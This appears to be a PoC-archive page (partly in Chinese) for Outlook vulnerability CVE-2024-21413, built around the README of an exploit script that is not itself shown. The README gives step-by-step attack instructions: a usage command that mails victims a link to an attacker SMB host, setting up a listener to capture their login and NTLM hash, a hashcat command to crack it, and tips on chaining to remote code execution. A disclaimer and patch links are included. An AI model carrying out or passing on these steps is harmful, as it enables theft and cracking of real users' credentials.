关联漏洞
标题:
Microsoft Outlook 安全漏洞
(CVE-2024-21413)
描述:Microsoft Outlook是美国微软(Microsoft)公司的一套电子邮件应用程序。 Microsoft Outlook 存在安全漏洞。以下产品和版本受到影响:Microsoft Office 2019 for 32-bit editions,Microsoft Office 2019 for 64-bit editions,Microsoft 365 Apps for Enterprise for 32-bit Systems,Microsoft 365 Apps for Enterprise
描述
Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC
介绍
# CVE-2024-21413 - Expect Script POC
Microsoft Outlook Leak credentials & Remote Code Execution Vulnerability when chained with CVE-2023-21716 (through the preview panel)
CVSS:3.1 9.8 / 8.5
Outlook should warm you about the risk on opening an external link => but this is not the case!

usage: ./cve-2024-21413.sh mx.fqdn port sender recipient url
./cve-2024-21413.sh mail.mydomain.com 25 me@home.com to@other.com "\\\\xx.xx.xx.xx\\test\\duy31.txt"
notes: chmod +x cve-2024-21413.sh
require app expect & require legitimate ip sender and email sender (to pass SPF, DKIM, DMARC)
---------------
- First run a smb listener like that

- run the poc

- and wait for the email & in the preview windows click on the link

- then you should retrieve the login & hash of the person that clicked on the link (without the warning prompt on affected outlook version)

- You can then try to crack the password with hashcat. Just copy all the line with the login name to a file and run hashcat with module 5600
hashcat -a 0 -m 5600 hash.txt rockyou.txt -o cracked.txt -O
- You can chain this CVE with CVE-2023-21716 to obtain RCE !!!
-------------------
Kudos: [https://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/]
Workaround/Fix: [https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413]
-------------------
more about me ;) https://www.linkedin.com/in/duy-huan-bui/
⚠️ Disclaimer: IMPORTANT: This script is provided for educational, ethical testing, and lawful use ONLY. Do not use it on any system or network without explicit permission. Unauthorized access to computer systems and networks is illegal, and users caught performing unauthorized activities are subject to legal actions. The author is NOT responsible for any damage caused by the misuse of this script.
文件快照
[4.0K] /data/pocs/775684ee722ef929fb0c9f4a9c0ae90024ede5f8
├── [1.1K] cve-2024-21413.sh
└── [2.3K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。